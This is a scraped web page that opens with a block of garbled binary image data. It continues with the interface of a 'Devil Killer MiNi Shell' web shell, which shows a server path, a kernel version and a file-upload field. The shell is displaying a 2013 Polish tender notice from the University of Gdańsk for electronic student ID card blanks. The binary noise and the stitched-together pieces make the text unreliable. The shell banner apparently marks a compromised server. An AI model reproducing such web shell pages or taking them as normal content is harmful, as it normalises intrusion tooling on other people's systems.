JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/121528-N-2013.html

<p class="kh_header"><b>Gdańsk: Dostawa blankietów kart elektronicznych do wydruku legitymacji studenta i legitymacji doktoranta dla Uniwersytetu Gdanskiego</b><br>
<b>Numer ogłoszenia: 121528 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa blankietów kart elektronicznych do wydruku legitymacji studenta i legitymacji doktoranta dla Uniwersytetu Gdanskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa 9000 sztuk blankietów elektronicznej legitymacji studenta (zwanych w dalej blankietami ELS) zadrukowanych zgodnie ze wzorem określonym w załączniku nr 3 do rozporządzenia Ministra Nauki i Szkolnictwa Wyższego z dnia 2 listopada 2006 r. w sprawie dokumentacji przebiegu studiów (Dz. U. z 2006 nr 224 poz. 1634 z późn. zm.) oraz 1000 sztuk blankietów elektronicznej legitymacji doktoranta (zwanych w dalej blankietami ELD) zadrukowanych zgodnie ze wzorem określonym w załączniku nr 2 do rozporządzenia Ministra Nauki i Szkolnictwa Wyższego z dnia 5 października 2011 r. w sprawie studiów doktoranckich oraz stypendiów doktoranckich  (Dz. U. z 2011 nr 225 poz. 1351 z późn zm.)  w postaci elektronicznych blankietów procesorowych wyposażonych w interfejs stykowy oraz bezstykowy przeznaczonych do identyfikacji osoby (studenta, doktoranta) Kod CPV: 30237131-6.
2.Wymagania techniczno-funkcjonalne dla karty elektronicznej - blankietów ELS i ELD:
1)Wstępnie zadrukowany blankiet ELS i ELD będący hybrydowym elektronicznym blankietem procesorowym z dwoma interfejsami:
2)stykowym określonym w normach ISO/IEC 7816-2 i ISO/IEC 7816-3 o pojemności pamięci EEPROM co najmniej 67 kilobajtów
3)bezstykowym określonym w normie ISO/IEC 14443 typ A, zgodnym ze standardem przemysłowym MIFARER dla protokołu klasycznego o pojemności pamięci 1 kilobajt (MIFARER Stadnard Card IC MF1 IC S50 Functional Specification).
3.Blankiety ELS i ELD muszą być wykonane z materiału nie ulegającemu odkształceniu i / lub rozwarstwieniu. 
4.Blankiety ELS i ELD muszą poprawnie współpracować z modułem PERSO systemu OPTIcamp SELS w wersji 1.95. w zakresie personalizacji elektronicznej części stykowej jak i graficznej blankietów ELS i ELD.
5.Część elektroniczna - stykowa:
1)Część stykowa blankietów ELS i ELD jest wyposażona w interfejs określony w normach  ISO/IEC 7816-2 i ISO/IEC 7816-3.
2)Polecenia i odpowiedzi przesyłane podczas komunikacji blankietów ELS i ELD       z infrastrukturą informatyczną powinny mieć strukturę zgodną z APDU określoną      w normie ISO, IEC  7816-4.
3)Polecenia realizowane przez blankiety ELS i ELD dla operacji kryptograficznych i zarządzania są zgodne z ISO/IEC 7816-8, ISO/IEC 7816-9 oraz opcjonalnie ISO/IEC 7816-15. 
6.Blankiet ELS i ELD może być stosowany jako komponent techniczny urządzenia do składania podpisu elektronicznego (ustawa z dnia 18 września 2001 r. o podpisie elektronicznym - Dz. U. 2001 nr 130 poz. 1450).
7.Blankiet ELS i ELD musi spełniać następujące wymagania:
1)Układ elektroniczny o pojemności pamięci EEPROM co najmniej 67 kilobajtów z wbudowanym koprocesorem kryptograficznym.
2)Układ elektroniczny blankietu ELS i ELD musi posiadać certyfikat Common Criteria Standard na poziomie co najmniej  EAL4+.
3)Card Management i API zgodne z Global Platform 2.1.1 
4)System operacyjny Java Card Virtual Machine, RTE i API zgodne z JC2.2.1
5)Blankiet ELS i ELD musi posiadać certyfikat Common Criteria Standard według profilu PPSSCD Protection Profile - Secure Signature Creation Device Type 2 and/or 3, version 1.05, EAL4+ (CWA14169).
6)Zgodny ze standardem funkcjonalności E-Sign K (CWA14890).
7)DAP zgodne z Global Platform 2.1  (PK-Based).
8)Obsługiwane protokoły: T=0, T=1, PPS.
9)Prędkość transmisji czytnik - blankiet do 230 Kbauds.
10)Dostęp do klucza prywatnego zapisanego na blankiecie ELD i ELS możliwy jest wyłącznie przez koprocesor kryptograficzny blankietu.
11)Wszystkie operacje kryptograficzne dotyczące klucza prywatnego wykonywane na blankiecie ELS i ELD.
12)Użycie klucza prywatnego tylko po podaniu kodu PIN użytkownika.
13)Generowanie kluczy kryptograficznych o długości do 2048 bitów przeznaczonych do użycia przez algorytm RSA, podpisywanie za pomocą algorytmu RSA, obsługa funkcji skrótu SHA-1, SHA-256, obsługa algorytmów DES, 3DES (ECB, CBC), AES.
14)Blankiet ELS i ELD przystosowany do umieszczenia na nim certyfikatu kwalifikowanego wraz z kluczami kryptograficznymi oraz certyfikatu niekwalifikowanego wraz z kluczami kryptograficznymi; certyfikaty mogą zostać umieszczone w późniejszym czasie.
8.Część elektroniczna - bezstykowa:
Część bezstykowa jest wyposażona w interfejs zgodny z ISO/IEC 14443 typ A.
Sposób komunikacji blankietu ELS i ELD jest zgodny ze standardem przemysłowym MIFARER dla protokołu klasycznego spełniającym wymagania normy ISO/IEC 14443-1, ISO/IEC 14443-2, ISO/IEC 14443-3 oraz opcjonalnie ISO/IEC 14443-4 (protokół T=CL), przy zachowaniu pełnej antykolizyjności.
9.Blankiet ELS i ELD musi co najmniej spełniać następujące wymagania:
1)każdy blankiet ELS i ELD musi zawierać unikalny i niezmienny numer zapisany na 32 bitach, programowany trwale przez producenta układu pamięciowego,
2)blankiety ELS i ELD muszą umożliwiać wzajemne uwierzytelnianie z czytnikiem systemu działającym zgodnie z normą ISO/IEC 9798-2
3)komunikacja między blankietem ELS i ELD i czytnikiem, odbywająca się drogą radiową, musi być szyfrowana szyfratorem strumieniowym, przy czym klucz szyfrujący powinien być ustalany na podstawie generowanej na blankiecie liczby losowej, numeru seryjnego blankietu i 48-bitowych kluczy zainstalowanych w czytniku i na blankiecie,
4)dostęp do każdego z 16 sektorów musi być zabezpieczony za pomocą kluczy (dla  każdego sektora oddzielna para 48-bitowych kluczy),
5)w celu detekcji błędów w komunikacji z czytnikiem (dla zapewnienia kontroli integralności danych) blankiet ELS i ELD musi posiadać zaimplementowane mechanizmy kontroli parzystości przesyłanych bajtów i integralności przesyłanych danych (CRC_A, określone także CRC16) zgodnie z normą ISO/IEC 14443-3            dla blankietów ELS i ELD typu A,
6)musi istnieć możliwość trwałego blokowania programowanych funkcji zapisu dla każdego bloku niezależnie (oprócz bloku 0 w sektorze 0), np. dla blankietów ELD i ELS  wycofanych z obiegu.
7) Komunikacja
a)komunikacja między blankietem ELS i ELD a czytnikiem odbywa się drogą radiową - częstotliwość nośna: 13,56 MHz,
b)szybkość komunikacji: 106 kBits/s (Kbaud),
c)protokół komunikacyjny: half duplex,
d)zasięg operacyjny: minimum 9 cm.
8)  Pamięć
a)technologia: CMOS EEPROM,
b)pojemność: 8 kBit (1 kBajt) [16 sektorów po 512 bitów],
c)podzielona na 16 niezależnych sektorów po 4 bloki każdy,
d)ilość cykli zapisu: minimum 100 000,
e)ilość cykli odczytu: nielimitowana,
f)okres przechowywania danych: 10 lat.
9) Zasilanie - blankiet ELS i ELD zasilany jest indukcyjnie przez czytnik. Blankiet nie posiada własnego    źródła zasilania
10) Parametry wytrzymałościowe
a)wytrzymałość: mechaniczna, temperaturowa (od -20 oC do + 50 oC) bez utraty funkcjonalności i walorów estetycznych oraz wytrzymałość chemiczna muszą spełniać co najmniej wymagania określone w normie ISO/IEC 10373,
b)trwałość całkowita 10 lat w warunkach normalnej eksploatacji,
c)wilgotność względna środowiska pracy karty do 90 %.
11) Certyfikat - wymagany jest ważny certyfikat MIFARER wystawiony przez Certification Institute z Austrii lub inną równoważną uprawioną do tego instytucję.
10.Zabezpieczenia na czas dostawy:
Dostęp do układów elektronicznych blankietów ELS i ELD jest zabezpieczany na czas dostawy specjalnymi kluczami transportowymi dla części bezstykowej (MIFARER) i stykowej. Wraz z dostawą klucze zostaną przekazane Zamawiającemu.
11.Oprogramowanie:
Do każdego blankietu ELS i ELD Wykonawca dołączy licencję na oprogramowanie Middleware umożliwiające zarządzanie blankietem oraz wykorzystanie dodatkowych możliwości blankietu.
12.Pochodzenie blankietów ELS i ELD: blankiety muszą być oryginalne, pochodzić z oficjalnego kanału dystrybucji. 
13.Wykonawca dołączy do oferty Specyfikacje Techniczne systemów ELS i ELD wystawione  przez producenta potwierdzające powyższe wymagania. 
14.Gwarancja:
Blankiety mają być objęte minimum 24 miesięczną gwarancją producenta.
15.Wykonawca dostarczy blankiety  ELS i ELD własnym transportem na własny koszt oraz  zapewni rozładunek wraz z wniesieniem. 
16.Miejsce dostawy: Rektorat Uniwersytetu Gdańskiego Dział Kształcenia - III piętro, pokój  309, ul. Bażyńskiego 1a, 80-952 Gdańsk,- osoba odpowiedzialna za odbiór p. Danuta Karasek.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  zgodnie  z  art. 67  ust.1  pkt.7  ustawy  Prawo zamówień publicznych, przewiduje  możliwość  wystąpienia  zamówień   uzupełniających,  nie  więcej  niż  do  20 %  wartości  brutto zamówienia podstawowego, zgodnie z opisem przedmiotu zamówienia zawartym w rozdziale II SIWZ</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.31-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych  lub ciągłych również wykonywaniem  co najmniej dwóch dostaw blankietów ELS lub ELD odpowiadających swoim rodzajem  przedmiotowi niniejszego zamówienia o wartości nie mniejszej niż 50. 000,00 zł. brutto każda , w okresie ostatnich trzech lat przed upływem terminu składania ofert,    a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów  na rzecz których dostawy zostały wykonane  oraz załączeniem dowodów potwierdzających, że  dostawy zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg   formuły 
spełnia - nie spełnia na   podstawie    dokumentów   opisanych  w rozdziale V   
SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ponadto Wykonawca złoży wraz z ofertą: 
1) oświadczenie o podwykonawcach,  Wykonawca  wykonujący zamówienie wyłącznie siłami   własnymi    nie   dołącza   do   oferty    załącznika  nr  7    (do SIWZ),
2)zaakceptowany   przez    Wykonawcę    projekt    umowy  -  załącznik  nr  5      (do SIWZ );  Wykonawca   może też zastosować się do informacji   zawartej     w rozdziale XVI pkt. 1).
3)w celu potwierdzenia, że oferowane, dostawy  odpowiadają wymaganiom określonym w SIWZ, Zamawiający  żąda dostarczenia:
a)Specyfikacji  Technicznych   systemów   ELS i ELD, których autentyczność musi zostać poświadczona przez Wykonawcę.
b)Certyfikatu MIFARER wystawionego przez Certification Institute z Austrii lub inną równoważną uprawioną do tego instytucję.
c)po 5 sztuk próbek, blankietów legitymacji ELS i ELD będących przedmiotem zamówienia, których autentyczność musi zostać poświadczona przez Wykonawcę.
Wykonawcy ubiegający się  wspólnie  o  udzielenie  zamówienia  składają  jeden  komplet dokumentów, o których mowa powyżej.
2.Wykonawcy mający siedzibę  lub miejsce zamieszkania za granicą:
1)Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - zamiast dokumentów  wymienionych  w  rozdziale V pkt. 2 ppkt.  2),3),4) SIWZ składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,  potwierdzające odpowiednio, że:
a)nie otwarto jego  likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego organu,
2)Dokumenty, o których mowa w pkt. 1) lit. a) , powinny być wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa  w pkt. 2) lit. b), powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów  zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji Wykonawcy złożone przed, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
Wymogi dotyczące terminu wystawienia dokumentów określone w ppkt 2 stosuje się odpowiednio.   
3.Informacje dotyczące składania dokumentów:  
1)Dokumenty sporządzone w języku obcym muszą być składane wraz  z tłumaczem na język polski, poświadczonymi za zgodność z oryginałem   przez Wykonawcę. Wykonawca, według swojego uznania może też przedstawić  tłumaczenie dokonane przez tłumacza przysięgłego, które nie wymaga  poświadczenia za zgodność.
2)Dokumenty mają być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy zgodnie z wpisem w stosownym  dokumencie uprawniającym do wystąpienia w obrocie prawnym) lub notariusza.
3)Zamawiający nie  dopuszcza składania elektronicznych dokumentów opatrzonych przez  Wykonawcę  bezpiecznym podpisem elektronicznym weryfikowanym za  pomocą ważnego kwalifikowanego certyfikatu.
4)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą być poświadczone za  zgodność z  oryginałem odpowiednio przez Wykonawcę  lub  te  podmioty.
5)Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej,  przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym,  jeżeli zostanie potwierdzony przez organ wydający  w wymaganym terminie.
6)Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których  mowa w art. 25 ust.1  oraz art. 26 ust. 2d ustawy, lub którzy nie złożyli pełnomocnictw,  albo którzy  złożyli wymagane przez Zamawiającego oświadczenia i dokumenty,      o których  mowa w art. 25 ust. 1 oraz art. 26 ust. 2d ustawy zawierające błędy,  lub którzy złożyli wadliwe  pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich  złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby  unieważnienie postępowania. Złożone na wezwanie Zamawiającego  oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę  warunków udziału w postępowaniu nie później niż w dniu, w którym  upłynął  termin składania ofert - art. 26 ust. 3 ustawy.
7)Zamawiający wezwie  także Wykonawców, w wyznaczonym przez  siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub  dokumentów, o których mowa w art. 25 ust. 1 oraz 26 ust. 2d ustawy. 
8)Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy  nie  wykażą spełnienia warunków udziału w postępowaniu. Ofertę Wykonawcy  wykluczonego uznaje się za odrzuconą.
9)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na  podstawie art. 23 ust. 1 - 3 ustawy, w tym w ramach konsorcjum.
10)W przypadku opisanym w ppkt. 9) Wykonawcy ustanawiają pełnomocnika do  reprezentowania ich w postępowaniu o udzielenie zamówienia albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego.
11)Jeżeli  oferta  Wykonawców, o których  mowa  w  ppkt. 9) została  wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców   (art. 23 ust. 4 ustawy).
